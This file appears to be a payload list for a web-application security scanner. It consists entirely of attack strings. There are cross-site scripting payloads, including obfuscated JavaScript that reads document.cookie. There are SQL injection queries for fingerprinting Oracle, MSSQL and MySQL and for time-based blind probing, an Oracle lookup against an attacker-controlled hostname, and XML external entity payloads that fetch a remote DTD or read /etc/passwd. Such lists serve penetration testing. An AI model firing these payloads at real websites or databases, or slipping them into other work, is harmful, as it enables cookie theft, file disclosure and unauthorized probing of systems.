title=Sploits-GitHub
locator='';!--"<XSS>=&{()}
basic_1=<script>alert(123);</script>
basic_2=<script>alert("XSS");</script>
basic_3=<script>alert(/XSS/);</script>
img_1=<img src=a onerror=alert(123); />
img_2=<img src=a onerror=alert("XSS"); />
img_3=<img src=a onerror=alert(/XSS/); />
img_4=<img SRC="javascript:alert('XSS');">
xss.img_grave=<IMG SRC=`javascript:alert("'XSS'")`>
xss.anchor_1=<a onmouseover=alert(document.cookie)>xxs link</a>
xss.malformed_script=<<SCRIPT>alert("XSS");//<</SCRIPT>
xss.malformed_body=<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
xss.halfOpen=<IMG SRC="javascript:alert('XSS')"
xss.js_1=\";alert('XSS');//
xss.js_2=\";alert(/XSS/);//
xss.js_3=this["alert"]("xss")
xss.js_4=window["alert"]("xss")
partial.nonAlpha_alertOne=window[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]]((-~[]+[]))
partial.nonAlpha_alertOneTwoThree=window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]](123)
partial.charCode=String.fromCharCode(88,83,83)
partial.cookie_0=document["cookie"]
partial.cookie_1=document[({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'\x6b\x69\x65']
partial.cookie_2=document["\x63\x6f\x6f\x6b\x69\x65"]
partial.cookie_3=document[({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'kie']
xss.doubleByte_1=%u003cscript%u003ealert(123);%u003c/script%u003e
xss.doubleByte_2=%uff1cscript%uFF1ealert(123);%uff1c/script%uff1e
sql.oracle_version_1=SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'
sql.oracle_version_2=SELECT banner FROM v$version WHERE banner LIKE 'TNS%'
sql.oracle_version_3=SELECT version FROM v$instance
sql.oracle_user=SELECT user FROM dual
sql.oracle_currentDB=SELECT SYS.DATABASE_NAME FROM DUAL
sql.oracle_case=SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual
sql.oracle_delay_1=SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual
sql.oracle_delay_2=SELECT UTL_INADDR.get_host_address('blah.attacker.com') FROM dual
sql.MSsql_version=SELECT @@version
sql.MSsql_user_1=SELECT user_name()
sql.MSsql_user_2=SELECT system_user
sql.MSsql_user_3=SELECT user
sql.MSsql_user_4=SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID
sql.MSsql_cast=SELECT CAST('1' as int)
sql.MSsql_case=SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END
sql.MSsql_currentDB=SELECT DB_NAME()
sql.MSsql_delay=WAITFOR DELAY '0:0:5'
sql.mysql_version=SELECT @@version
sql.mysql_user_1=SELECT user()
sql.mysql_user_2=SELECT system_user()
sql.mysql_currentDB=SELECT database()
sql.mysql_cast=SELECT cast('1' AS unsigned integer)
sql.mysql_case=SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END
sql.mysql_delay_1=SELECT BENCHMARK(1000000,MD5('A'));
sql.mysql_delay_2=SELECT SLEEP(5)
xml.entity=<!DOCTYPE x [ \n<!ENTITY xx "123">\n]>\n<x>&xx;</x>
xml.entity_remote=<!DOCTYPE x [ \n<!ENTITY xx SYSTEM "http://127.0.0.1/file.dtd">\n]>\n<x>&xx;</x>
xml.entity_etc_passwd=<!DOCTYPE x [ \n<!ENTITY xx SYSTEM "file:///etc/passwd">\n]>\n<x>&xx;</x>




